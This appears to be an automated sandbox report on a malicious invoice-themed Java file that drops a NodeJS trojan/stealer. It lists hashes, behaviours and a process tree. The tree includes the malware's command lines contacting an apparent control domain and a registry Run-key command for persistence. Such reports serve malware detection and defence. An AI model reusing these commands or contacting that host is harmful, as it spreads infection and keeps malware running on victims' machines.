Analysis
-
max time kernel
115s -
max time network
139s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
24-11-2020 19:28
Static task
static1
Behavioral task
behavioral1
Sample
Rechnung 1.jar
Resource
win7v20201028
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
Rechnung 1.jar
Resource
win10v20201028
windows10_x64
0 signatures
0 seconds
General
-
Target
Rechnung 1.jar
-
Size
50KB
-
MD5
5847b21081ad895a7af96259f5ec0d59
-
SHA1
a690cb52bbb216fa181d700df67181c90c31d014
-
SHA256
bd2ef877f531d56a5a2a93d269d19e09195b908b2f39cd8b092f03916ed3b2b1
-
SHA512
cb844a4b2e976bad6d44c316b9718a2f795b00b91690cfd340ad4e7782eca279f58ff74cc79bc63d9d79e5aa8f232c2fc3e5cdb8b71f8d7a8f125e501d80224f
Score
10/10
Malware Config
Signatures
-
QNodeService
Trojan/stealer written in NodeJS and spread via Java downloader.
-
Executes dropped EXE 3 IoCs
pid Process 4000 node.exe 1020 node.exe 504 node.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\75b8ffbb-a237-46bf-95d5-27d50d438190 = "cmd /D /C \"C:\\Users\\Admin\\qhub\\node\\2.0.10\\boot.vbs\"" reg.exe -
JavaScript code in executable 3 IoCs
resource yara_rule behavioral2/files/0x000100000001aba0-163.dat js behavioral2/files/0x000100000001aba0-166.dat js behavioral2/files/0x000100000001aba0-170.dat js -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 21 wtfismyip.com 22 wtfismyip.com -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString node.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString node.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz node.exe -
Suspicious behavior: EnumeratesProcesses 18 IoCs
pid Process 4000 node.exe 4000 node.exe 4000 node.exe 4000 node.exe 1020 node.exe 1020 node.exe 1020 node.exe 1020 node.exe 504 node.exe 504 node.exe 504 node.exe 504 node.exe 504 node.exe 504 node.exe 504 node.exe 504 node.exe 504 node.exe 504 node.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 636 wrote to memory of 2220 636 java.exe 76 PID 636 wrote to memory of 2220 636 java.exe 76 PID 2220 wrote to memory of 4000 2220 javaw.exe 80 PID 2220 wrote to memory of 4000 2220 javaw.exe 80 PID 4000 wrote to memory of 1020 4000 node.exe 82 PID 4000 wrote to memory of 1020 4000 node.exe 82 PID 1020 wrote to memory of 504 1020 node.exe 83 PID 1020 wrote to memory of 504 1020 node.exe 83 PID 504 wrote to memory of 4060 504 node.exe 85 PID 504 wrote to memory of 4060 504 node.exe 85 PID 4060 wrote to memory of 4020 4060 cmd.exe 86 PID 4060 wrote to memory of 4020 4060 cmd.exe 86
Processes
-
C:\ProgramData\Oracle\Java\javapath\java.exejava -jar "C:\Users\Admin\AppData\Local\Temp\Rechnung 1.jar"1⤵
- Suspicious use of WriteProcessMemory
PID:636 -
C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe"C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar C:\Users\Admin\AppData\Local\Temp\3d23a556.tmp2⤵
- Suspicious use of WriteProcessMemory
PID:2220 -
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe - --hub-domain september101991.ddns.net3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4000 -
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_DxLeVY\boot.js --hub-domain september101991.ddns.net4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1020 -
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_DxLeVY\boot.js --hub-domain september101991.ddns.net5⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:504 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "75b8ffbb-a237-46bf-95d5-27d50d438190" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\"""6⤵
- Suspicious use of WriteProcessMemory
PID:4060 -
C:\Windows\system32\reg.exeREG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "75b8ffbb-a237-46bf-95d5-27d50d438190" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\""7⤵
- Adds Run key to start application
PID:4020
-
-
-
-
-
-